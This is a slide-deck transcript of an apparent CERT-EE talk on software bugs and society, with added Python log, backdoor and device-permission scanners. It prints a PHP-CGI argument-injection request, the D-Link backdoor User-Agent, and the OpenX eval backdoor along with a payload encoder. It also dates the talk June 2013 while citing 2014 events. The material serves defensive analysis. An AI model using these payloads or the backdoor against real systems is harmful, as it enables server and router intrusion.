“Software errors as the founding pillar of the modern society”

Post on 13-Apr-2020


2013-06-06, Tallinn

Anto Veldre, CERT-EE

“Software errors as the founding pillar of the modern society”

My daily work: Internet assenisation (sewage cleanup)

http://www.quickresponseplumbing.org

CERT – Computer Emergency Response Team


Disclaimer no 1

NB! Pictures' © still belong to the respective owners


Disclaimer no 2

Many concurrent truths

http://maddy06.blogspot.com/2012/10/six-blind-men-and-elephant.html

Disclaimer no 3

- a Finno-Ugric fuzz vs the corporate style
- “вокруг да около” (Russian: “beating around the bush”)
- “walk around a topic & never touch the issue”
- gangnam NLP style

http://kunstiveeb.blogspot.com

My talk around these topics:

1 – Engineering, complexity, Q/A
2 – Bugs, incidents, scandals
3 – Modern times, e- / i- / x-society
4 – Where is the society moving?
5 – Social responsibility

Estonia

http://upload.wikimedia.org/wikipedia/commons/0/03/Kakerdaja_raba.jpg

Myths: Elbonian Nokia


The ugric mindset

a) population density b) water

Warning: next 2 slides!

We really go to sauna naked

http://www.saunapood.ee


Oh those Estonians :)

● 99 Estonian stereotypes
  – http://rs-df.com/forums/index.php?showtopic=54089

Normaalne!


That mighty IT country Estonia! (2007)

The pack has been numbered...

1984? Not at all.

2014! Hmm, the chip is well hidden on the back side

Use your ID-card as a loyalty card


Our secret weapon

– http://www.sk.ee

– http://www.id.ee

● State backed PKI
● Lack of physical offices
● Full automatization for some of the State functions
● The lifestyle
● [..]


Our life in Europe

- About 3% of the EU population speak non-Indo-European languages.
- Language relativism: we think differently.
- We believe in something, which is not necessarily God (Eurobarometer 2011) - not yet fully converted pagans?

http://tracemedia.co.uk/portfolio/mapping-wikipedia/

We stick our noses to what/where we shouldn't

http://visualoop.com/8629/the-world-map-according-to-twitter


The developer's philosophy

A naïve approach – Howard Longstaff


Technology Readiness


System readiness

http://www.sercuarc.org/uploads/files/TR%20027_RT%2027_System%20Maturity%20and%20Architecture%20Assessment%20MPTs.pdf

http://en.wikipedia.org/wiki/Complex_systems

Jonathan Swift (mdcrawford@gmail.com) says: http://www.warplife.com/jonathan-swift/books/software-problem/

● Software failure is fundamentally a human problem, not a technical one.

● Purely technical solutions fail to effect truly meaningful and lasting change.

– The Computer Problem,

– The Mental Problem,

– The Social Problem.

@againsthimself once tweeted:

“@sergeybratus: We are in the only technical discipline that is getting laws before textbooks.”

Complexity

http://staff.science.uva.nl/~leo/lego/bike.html

http://www.galaxiki.org/web/main/_blog/all/build-your-own-nasa-apollo-landing-computer-no-kidding.shtml

● Formally auditable:
  – 1000 lines of code (1kLoC)?
  – 10k lines of code?
  – (using some testing suite) 100k?
  – Apollo 11: 145kLoC

http://en.wikipedia.org/wiki/List_of_software_bugs

http://www.itworld.com/big-datahadoop/288893/lines-code-apollo-curiosity

http://en.wikipedia.org/wiki/Evaluation_Assurance_Level

● EAL1: Functionally Tested

● EAL2: Structurally Tested

● EAL3: Methodically Tested and Checked

● EAL4: Methodically Designed, Tested and Reviewed

● EAL5: Semiformally Designed and Tested

● EAL6: Semiformally Verified Design and Tested

● EAL7: Formally Verified Design and Tested

The pitfall: from EAL4 upwards, security must be designed into the system; you cannot add it later.

Pitfall no 23 – can you afford this?

Non-mature technologies... The winner takes it all!

http://theresilientearth.com/?q=content/cargo-cult-climate-science


The Nature


OSI 7 layers

+2 extra ;)


Back to basics ;)

● http://www.newchrono.ru/prcv/Publ/kes-popul-eng.html

Route 666, Speed 177

• Development of technology:
  – ever faster
  – it is not a fashion
  – it won't stop
  – next events depend on previous events

New World Order?


Unknowns and the amplification

These two crucial conditions:

● it is complex
● the constituents are tightly intercoupled

2011-12-1x

– http://en.wikipedia.org/wiki/Positive_feedback


@NicholasTaleb - 4Q, Black Swans


Richards Heuer

● Why did all the intel analysts miss the collapse of the Soviet Union?

● How does your mind work?

● Where & when can an analyst go wrong?

● Adjusting your input filter (hmm ... pink glasses)

https://www.cia.gov/library/center-for-the-study-of-intelligence/csi-publications/books-and-monographs/psychology-of-intelligence-analysis/index.html

Jay Forrester - System Dynamics


Mark Andrejevic - The Digital Enclosure

An interactive realm wherein every action and transaction generates information about itself.

How to ...


Suarez


Elsberg

e- / i- / x-society

http://www.imdb.com/title/tt0181689/

2002


Milk'n'fuel paradigm

http://y.delfi.ee/norm/102149/4987007_FZJEkH.jpeg


Who is the adversary? Is he thinking?

Who's the adversary? 2


Is there an adversary at all?

?


Really???


News from Bahrain

http://www.theregister.co.uk/2013/08/12/spy_bins_scrapped_from_london_streets/

http://www.youtube.com/watch?v=SNPJMk2fgJU

Quadrotor with machine gun


bugs / errors / faults

How and why?


EXFAC03-AAS

http://www.uio.no/studier/emner/hf/ikos/EXFAC03-AAS/h05/larestoff/linguistics/


Optical cheats / illusions


Optical illusions


Optical illusions - bubbling


The reality


Spy phones & spy TV sets

● S3 memory dev writable - /dev/exynos-mem

– http://forum.xda-developers.com/showthread.php?p=35469999#post35469999

http://doctorbeet.blogspot.com/2013/11/lg-smart-tvs-logging-usb-filenames-and.html

http://obamapacman.com/2013/07/r2b2-android-phone-pin-hacking-robot/
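The /dev/exynos-mem item above is a permission bug: a character device that maps physical memory was left writable by every local app. What follows is an added example, not code from the talk or from the linked forum thread, of the check an auditor runs over a device tree. The allowlist holds the nodes that are world-writable by design on Linux; every other device node that "others" may write to is reported, and a memory-mapping node should never be among them.

```python
import os
import stat

# Device nodes that are 0666 by design on Linux: they hold no state worth protecting.
EXPECTED_WORLD_WRITABLE = frozenset({
    "/dev/null", "/dev/zero", "/dev/full", "/dev/random", "/dev/urandom",
    "/dev/tty", "/dev/ptmx",
})


def risky_device_mode(mode):
    """True if st_mode describes a character or block device that 'others' may write to."""
    is_device = stat.S_ISCHR(mode) or stat.S_ISBLK(mode)
    return is_device and bool(mode & stat.S_IWOTH)


def world_writable_devices(paths, allow=EXPECTED_WORLD_WRITABLE):
    """Return [(path, octal_mode)] for device nodes among `paths` that others can write to.
    Paths in `allow` and paths that do not exist are skipped. lstat() is used on purpose:
    a symlink is not a device, so the target node is judged under its own path."""
    hits = []
    for p in paths:
        if p in allow:
            continue
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if risky_device_mode(st.st_mode):
            hits.append((p, oct(stat.S_IMODE(st.st_mode))))
    return hits


def audit_dev(root="/dev"):
    """Walk a device tree and report offending nodes. A /dev/exynos-mem with mode 0666,
    as on the slide, would be listed here."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        found.extend(world_writable_devices(os.path.join(dirpath, f) for f in files))
    return found


if __name__ == "__main__":
    for path, mode in audit_dev():
        print(path, mode)
```

Run it on a rooted phone's /dev (or on a firmware image's extracted device table) and compare the list against the vendor's intent; anything that exposes memory, flash or a bus must be root-only.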


Mifare vs ID brokerage


Toyota

http://www.nhtsa.gov/UA


Independent researchers

● Satan votes at the internet?
  – Reproducibility?
  – https://www.ria.ee/e-voting-is-too-secure/

http://www.theregister.co.uk/2007/02/28/f22s_working_again/

http://en.wikipedia.org/wiki/List_of_software_bugs


1989

http://en.wikipedia.org/wiki/Phobos_program

1999

http://en.wikipedia.org/wiki/Mars_Polar_Lander


PHP5 CGI

● Log line:
  111.111.111.111 - - [11/Nov/2013:11:11:11 +0200] "POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1" 404 226 "-" "-"

● URL-decoded:
  cgin/php?-d aluon -d mod -d suhon=on -d uncts="" -d dne -d auto_pr%t -d cgi.force_redirect=0 -d t_=0 -d ut -n

http://www.string-functions.com/urldecode.aspx

D-Link

/* Excerpt of the firmware's HTTP authentication check, as reverse-engineered
   on the devttys0 page linked below: a request whose User-Agent equals the
   magic string is treated as authenticated. */
if (strstr(request->url, "graphic/") ||
    strstr(request->url, "public/") ||
    strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
{
    return AUTH_OK;
}

DIR-100

DI-524

DI-524UP

DI-604S

DI-604UP

DI-604+

TM-G5240

DIR-615

http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

+WPS

http://www.infosecurity-magazine.com/view/37266/cymru-discovers-300000-compromised-home-routers/
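Both the PHP5 CGI log line and the D-Link magic User-Agent are things a CERT analyst wants to spot in web-server logs. The following is an added example, not code from the talk or from any of the linked write-ups: a small combined-log parser with one detector for php-cgi query-string argument injection and one for the hard-coded D-Link User-Agent. The php-cgi rule rests on RFC 3875 section 4.4 (a query string with no unencoded "=" is passed to the CGI program as argv), which is why the attacker encodes every "=" as %3D, as the decoded slide line shows. The first sample line is the log line from the slide; the other two are constructed for this example, with RFC 5737 test addresses and made-up paths.

```python
import re
from urllib.parse import unquote, unquote_plus

# Apache/nginx "combined" access-log format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent string that the devttys0 write-up linked above found to return AUTH_OK.
DLINK_BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"

# php.ini settings an attacker forces with injected "-d" arguments. The slide's line
# carries cgi.force_redirect=0; the other two are the usual companions for turning a
# POST body or a remote URL into executed PHP.
PHP_INI_OVERRIDES = ("cgi.force_redirect=0", "auto_prepend_file", "allow_url_include")


def parse_log_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def split_request_uri(uri):
    """Split path and raw query BEFORE decoding, then decode each part.
    '+' means space only in the query, so the path uses unquote() and the query unquote_plus()."""
    path, _, raw_query = uri.partition("?")
    return unquote(path), raw_query, unquote_plus(raw_query)


def php_cgi_argv_injection(raw_query):
    """RFC 3875 4.4: a query string with no unencoded '=' is handed to the CGI program as argv.
    php-cgi then honours its own options (-d sets a php.ini directive, -n skips php.ini).
    Flag when (a) the raw query has no literal '=' and (b) the decoded argv starts with an option."""
    if not raw_query or "=" in raw_query:
        return None
    argv = unquote_plus(raw_query).split()
    if not argv or not argv[0].startswith("-"):
        return None
    overrides = [a for a in argv if a.startswith(PHP_INI_OVERRIDES)]
    return {"argv": argv, "ini_overrides": overrides}


def classify(line):
    """Return a list of (rule, detail) findings for one log line; [] means nothing matched."""
    rec = parse_log_line(line)
    if rec is None:
        return [("unparsed", line[:60])]
    findings = []
    _path, raw_query, _decoded = split_request_uri(rec["uri"])
    hit = php_cgi_argv_injection(raw_query)
    if hit:
        findings.append(("php-cgi-argv-injection", hit))
    if rec["ua"] == DLINK_BACKDOOR_UA:
        findings.append(("dlink-backdoor-user-agent", rec["ip"]))
    return findings


def scan(lines):
    """Run classify() over an iterable of log lines; return {line_no: findings} for hits only."""
    return {n: f for n, f in ((n, classify(l)) for n, l in enumerate(lines, 1)) if f}


# Sample input: line 1 is the log line shown on the slide (including its stray "%%"),
# lines 2 and 3 are constructed for this example.
SAMPLE_LOG = [
    '111.111.111.111 - - [11/Nov/2013:11:11:11 +0200] "POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1" 404 226 "-" "-"',
    '198.51.100.7 - - [12/Oct/2013:03:14:15 +0300] "GET /admin/ HTTP/1.1" 200 1337 "-" "xmlset_roodkcableoj28840ybtide"',
    '192.0.2.10 - - [12/Oct/2013:03:20:00 +0300] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, findings)
```

The php-cgi rule deliberately ignores the decoded text of the options: the signal is structural (no literal "=", leading "-"), so a mangled or obfuscated argument list like the one on the slide still trips it, and the `ini_overrides` field only adds severity. A 404 does not mean the attempt failed elsewhere; check every host that exposes php-cgi under /cgi-bin.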

SoHo: @routerpwn rom-0

http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/


OpenX backdoor

http://blog.sucuri.net/2013/08/openx-org-compromised-and-downloads-injected-with-a-backdoor.html

As found, spliced into a JavaScript file:
  this.each(function(){l=flashembed(this,k,j)}<?php /*if(e){jQuery.tools=jQuery.tools||{version:{}};jQuery.tools.version.flashembed='1.0.2';*/$j='ex'./**/'plode'; /* if(this.className...

Stripped of the comments:
  <?php $j='explode'; $_=$j(",",'strrev,str_rot13,vastPlayer'); eval($_[1]($_[0]($_POST[$_[2]])));
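The one-liner above evaluates whatever arrives in the vastPlayer POST field after undoing two cheap transforms, strrev() and then str_rot13(). As an added example (not code from the talk or from the Sucuri write-up), here is the same transform in Python, so an analyst can decode captured POST bodies into the PHP that was executed, plus a crude scanner that flags PHP lines where eval() is fed by request input through string-built function names, as in the snippet on the slide. The sample file is constructed for this example around the slide's own line.

```python
import codecs
import re

# The backdoor on the slide runs: eval(str_rot13(strrev($_POST['vastPlayer'])))


def decode_openx_payload(blob):
    """Undo the backdoor's transform, PHP str_rot13(strrev(blob)): returns the PHP
    source that eval() would have executed."""
    return codecs.encode(blob[::-1], "rot_13")


def encode_openx_payload(php_source):
    """Inverse of decode_openx_payload(), i.e. what the operator's client sends:
    strrev(str_rot13(source))."""
    return codecs.encode(php_source, "rot_13")[::-1]


# Signals for the scanner. Each one alone is common in legitimate code; eval() fed by
# request input, with a decoder and a variable function call on the same line, is not.
EVAL_CALL = re.compile(r"\beval\s*\(")
REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
DECODER = re.compile(r"\b(?:str_rot13|strrev|base64_decode|gzinflate|gzuncompress)\b")
VARIABLE_CALL = re.compile(r"\$[A-Za-z_]\w*(?:\[[^\]]*\])?\s*\(")  # $j(...), $_[1](...)


def scan_php(source):
    """Return [(line_no, reasons)] for lines that call eval() on request input.
    'decoder' and 'variable function call' are added as reasons when also present."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        reasons = []
        if EVAL_CALL.search(line):
            reasons.append("eval")
        if REQUEST_INPUT.search(line):
            reasons.append("request input")
        if DECODER.search(line):
            reasons.append("decoder")
        if VARIABLE_CALL.search(line):
            reasons.append("variable function call")
        if "eval" in reasons and "request input" in reasons:
            findings.append((line_no, reasons))
    return findings


# Constructed sample: a JavaScript line, the slide's PHP backdoor, and an ordinary PHP
# line that reads $_POST without eval().
SAMPLE_PHP = """\
this.each(function(){l=flashembed(this,k,j)});
<?php $j='explode'; $_=$j(",",'strrev,str_rot13,vastPlayer'); eval ( $_[1]($_[0]( $_POST[$_[2]])) ); ?>
<?php $name = htmlspecialchars($_POST['name'] ?? ''); echo $name; ?>
"""

if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP))
    print(decode_openx_payload(encode_openx_payload("phpinfo();")))
```

The scanner is line-oriented on purpose: the OpenX injection put everything on one line inside a file that should never contain PHP at all, so a cheaper first pass is simply grepping JavaScript and image files for `<?php`.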


Apple SSL

http://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/

http://xkcd.com/1354/

The systemic risk – the bug market

● Watering Hole attack

● Defacements / pwned sites / malware distros

● Commoditized tools like Meterpreter & Metasploit


NSA & Snowden


Some latest news

All these thingz are technically possible...

SIGINT


This toilet is being monitored...

http://www.tabularasa-euproject.org/project/pdf/Anders%20Sandberg

20500,01% GDP


Who shall win?

* Rutkowska's principle: http://theinvisiblethings.blogspot.com/2011/04/why-us-password-revolution-wont-work.html

..the operating system can impersonate the user at will! This is because the operating system fully controls the keyboard, the mouse, and the screen.

* The OS (or browser) vendor is always in a preferred position

* BSI: "some critical aspects related to specific scenarios in which Windows 8 is operated in combination with a hardware that has a TPM 2.0"

The Anonymous???

http://blog.cognitivedissidents.com/2011/11/01/intro-to-hdmoores-law/

Future of the State

Once ...

Now ...

About the limits?


Organs substituted


http://www.forbes.com/sites/andygreenberg/2013/11/18/meet-the-assassination-market-creator-whos-crowdfunding-murder-with-bitcoins/

The Government

IT corporations

People, NGOs

Peter Dicken http://www.amazon.com/Global-Shift-Sixth-Edition-Changing/dp/1609180062


GrokLaw

● A teen tweet from Viljandi:

– Curtains are being washed. Want to m*. The satellites...

GrokLaw – Canary in the coal mine: When it is no longer possible to tell the truth online sufficiently for it to exist, none of us have the freedom of speech

– http://www.groklaw.net/article.php?story=20130818120421175

● UK porn filter requires self-incrimination:

– Pr0n?

– Terrorist materials?


The most modern governance model

● The Big Data
● State Secrets
● Killer Drones

Technically already feasible. A right direction?

;-)

Thnx!

Ask.fm?

Ask me!

Pic: http://www.imdb.com/title/tt0139809/